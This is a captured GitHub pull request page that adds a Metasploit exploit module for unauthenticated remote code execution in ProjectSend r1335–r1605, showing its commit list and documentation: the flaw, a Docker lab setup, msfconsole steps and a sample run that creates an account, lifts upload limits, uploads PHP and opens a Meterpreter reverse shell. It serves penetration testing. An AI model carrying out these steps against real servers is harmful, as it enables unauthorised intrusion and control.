Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

ProjectSend r1335 - r1605 RCE module #19531

Open
wants to merge 22 commits into
base: master
Choose a base branch
from
+534 −0
Open

ProjectSend r1335 - r1605 RCE module #19531

Show file tree
Hide file tree
Changes from 15 commits
Commits
Show all changes
22 commits
Select commit Hold shift + click to select a range
854cc7e
Create projectsend_unauth_rce
ostrichgolf Aug 30, 2024
6d507c5
Rename projectsend_unauth_rce to projectsend_unauth_rce.rb
ostrichgolf Aug 30, 2024
7d4a38f
Apply suggestions from code review
ostrichgolf Sep 3, 2024
3ecbd3d
remove mention of random generated username and password
ostrichgolf Sep 3, 2024
f268507
Apply suggestions from code review
ostrichgolf Sep 6, 2024
033de26
Update projectsend_unauth_rce according to feedback
ostrichgolf Sep 9, 2024
305c729
Add documentation for projectsend_unauth_rce
ostrichgolf Sep 23, 2024
74504cc
Apply suggestions from code review
ostrichgolf Sep 29, 2024
59b8378
move file deletion to cleanup function
ostrichgolf Sep 29, 2024
37ddc11
lint module
ostrichgolf Oct 5, 2024
5092006
Apply suggestions from code review
ostrichgolf Oct 7, 2024
eb3f2b7
update csrf extraction logic
ostrichgolf Oct 7, 2024
2cf1cf0
remove unnecessary clearing of cookie jar
ostrichgolf Oct 7, 2024
6fcd424
include comment about title regex
ostrichgolf Oct 7, 2024
ae3d2b9
linting
ostrichgolf Oct 7, 2024
79c76cf
Apply suggestions from code review
ostrichgolf Oct 20, 2024
6906476
Invert logic for status code
ostrichgolf Oct 20, 2024
78994be
Linux payloads does not seem compatible with PHP
ostrichgolf Oct 20, 2024
be296e8
Add support for version r1295
ostrichgolf Oct 20, 2024
2589247
Update documentation to include version r1295
ostrichgolf Oct 20, 2024
454e4be
Lint documentation
ostrichgolf Oct 20, 2024
7ab8677
Linting
ostrichgolf Oct 20, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
111 changes: 111 additions & 0 deletions documentation/modules/exploit/linux/http/projectsend_unauth_rce.md
View file
Open in desktop
ostrichgolf marked this conversation as resolved.
Show resolved Hide resolved
Original file line number Diff line number Diff line change
@@ -0,0 +1,111 @@
## Vulnerable Application
ProjectSend is a web application used for sharing files with clients.

Due to POST parameters being executed before checking user permissions, it is possible to perform a series of actions that can result in unauthenticated Remote Code Execution (RCE) on vulnerable versions of ProjectSend.

This module has been tested against ProjectSend versions r1335 through r1605 on Linux.

The easiest way to obtain a vulnerable version of ProjectSend is by deploying it using Docker, as pre-made images exist for the software. The following Docker Compose file can be used to set up a vulnerable environment.

```
---
services:
projectsend:
image: lscr.io/linuxserver/projectsend:version-r1605
container_name: projectsend
environment:
- PUID=1000
- PGID=1000
- TZ=Etc/UTC
- MAX_UPLOAD=5000
volumes:
- ./projectsend/config:/config
- ./projectsend/data:/data
ports:
- 80:80
restart: unless-stopped
db:
image: mariadb
restart: unless-stopped
container_name: db
volumes:
- ./mariadb_data:/var/lib/mysql
environment:
MYSQL_ROOT_PASSWORD: password
MYSQL_DATABASE: projectsend
MYSQL_USER: projectsend
MYSQL_PASSWORD: projectsend
```
After launching the containers, ProjectSend requires an initial configuration, which can be completed by accessing it via port 80 on localhost.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/projectsend_unauth_rce`
4. Set remote hosts: `set RHOSTS <ip>`
5. Set remote port: `set RPORT <port>`
6. Set the path to ProjectSend: `set TARGETURI <URI>`
7. Set local host: `set LHOST <local ip>`
8. Do: `run`
9. You should get a shell

```
msf6 exploit(linux/http/projectsend_unauth_rce) > options

Module options (exploit/linux/http/projectsend_unauth_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The TARGETURI for ProjectSend
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.20 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 ProjectSend r1335 - r1605
```

## Options
### TARGETURI
The uripath to the ProjectSend web application. Default is `/`.

## Scenarios
```
msf6 exploit(linux/http/projectsend_unauth_rce) > run

[*] Started reverse TCP handler on 192.168.1.20:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Client registration successfully enabled
[+] User alvin.padberg created with password lrASo3iM
[*] Disabling upload restrictions...
[*] Logging in as alvin.padberg...
[+] Logged in as alvin.padberg
[+] Successfully uploaded PHP file: sX1A4FCH.php
[*] Sending stage (39927 bytes) to 192.168.1.20
[*] Meterpreter session 1 opened (192.168.1.20:4444 -> 192.168.1.20:56675) at 2024-09-23 19:01:29 +0200
[*] Logging in as alvin.padberg...
[+] Logged in as alvin.padberg
[+] Client registration successfully disabled
[*] Enabling upload restrictions...

meterpreter > sysinfo
Computer : 1480205e55c2
OS : Linux 1480205e55c2 6.6.26-linuxkit #1 SMP Sat Apr 27 04:13:19 UTC 2024 aarch64
Meterpreter : php/linux
```
Loading
Loading